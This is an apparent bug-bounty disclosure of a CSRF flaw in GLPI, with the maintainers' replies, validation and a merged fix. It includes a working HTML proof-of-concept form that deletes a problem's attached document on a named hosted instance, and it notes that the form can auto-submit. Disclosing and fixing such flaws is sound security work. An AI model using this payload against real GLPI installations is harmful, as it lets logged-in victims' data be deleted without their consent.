Cross-Site Request Forgery (CSRF) in glpi-project/glpi

Valid

Reported on

Aug 5th 2021


✍️ Description

Attacker able to delete any document from Processing problem with CSRF attack because there is any CSRF protection for related endpoint.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can delete a Processing problem document, this means only with visiting a site a Processing problem document will be deleted.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here Processing problem document with id 6 from problem id equal to 1 will be deleted after clicking on submit button on PoC.html file.

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://nocompany.with7.glpi-network.cloud/front/problem.form.php">
<input type="hidden" name="delete&#95;document" value="" />
<input type="hidden" name="documents&#95;id" value="6" />
<input type="hidden" name="problems&#95;id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Also for real attacks the submit button can be auto-submit.

💥 Impact

This vulnerability is capable of delete any Processing problem document.

Fix

set a token with a length bigger that 16 characters in every requests body then attacker never can guess the url. Also you cat turn Lax to Strict in cookies. 📍 Location index.php#L1

amammad modified the report
a year ago
Z-Old
a year ago

Admin


Hey amammad, I've contacted the repo's maintainers for you.

We have contacted a member of the glpi-project/glpi team and are waiting to hear back a year ago
glpi-project/glpi maintainer
a year ago

Hi amammad, I created a Github security advisory for your 4 CSRF reports. https://github.com/glpi-project/glpi/security/advisories/GHSA-5qpf-32w7-c56p

amammad
a year ago

Researcher


Thanks, can you validate my reports If already you validate these CSRFs ?

amammad
a year ago

Researcher


Also the advisory link get 404 not found error and I don't know why..

glpi-project/glpi maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
glpi-project/glpi maintainer
a year ago

I added your Github account to collaborators on both advisories, you should be able to access them now.

amammad
a year ago

Researcher


yah thanks for your quick fix and perfect responsibility dear glpi team.

François Legastelois confirmed that a fix has been merged on 93750e a month ago
François Legastelois has been awarded the fix bounty
to join this conversation